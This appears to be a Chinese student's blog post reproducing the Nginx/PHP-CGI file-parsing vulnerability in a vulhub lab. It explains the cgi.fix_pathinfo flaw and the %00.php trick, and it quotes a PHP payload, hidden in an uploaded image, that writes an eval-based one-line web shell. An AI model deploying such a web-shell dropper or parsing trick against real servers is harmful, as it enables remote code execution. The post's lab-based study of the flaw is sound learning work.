重现Nginx解析漏洞的过程

今天被老师进行进行面试了，被问到了什么是解析漏洞，呜呜呜我太菜了，答不出来，但是生命不息，学习不止，现在就让我们一起学习一下什么是解析漏洞。

打开vulhub靶场，这个靶场搭建的方法在https://blog.****.net/Tauil/article/details/125869410?spm=1001.2014.3001.5502，这个漏洞的地址是在nginx/nginx_parsing_vulnerability，直接就是一个

cd nginx/nginx_parsing_vulnerability/
sudo docker-compose up -d

登录 http://靶机ip/uploadfiles/nginx.png，当在该URL中输入不存在的文件名x.php时，发现会自动显示php界面内容

这是什么原因呢？其实啊这就是nginx的文件解析出现了错误，在获得这个.php路径时他没有检查，一看是个.php后缀的文件就直接丢给php去处理了，php处理的时候发现 “诶？没有这个文件啊” 于是他就会继续向上找，就找到了.php的上级文件.jpg，然后把它当做php文件给处理了。具体的就看下面这个详细信息

Nginx 解析漏洞该解析漏洞是PHP CGI 的漏洞，在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启，当URL中有不存在的文件，PHP就会向前递归解析 在一个文件路径（/xx.jpg）后面加上/xx.php会将/xx.jpg解析为 php 文件。

Nginx<=0.8.37 解析漏洞 在Fast-CGI关闭的情况下，Nginx <=0.8.37 依然存在解析漏洞，在一个文件路径（/xx.jpg）后面加上%00.php 会将 /xx.jpg%00.php 解析为php 文件。另一种手法：上传一个名字为test.jpg，包含以下内容文件：<？PHP fputs(fopen(‘shell.php’.‘w’),’<?phpeval($_POST[cmd])?>’);?> 然后访问test.jpg/.php 在这个目录下就会生成一句话木马shell.php。

昂，具体内容在这https://blog.****.net/niqiu320/article/details/115481193，有兴趣的自己看一下。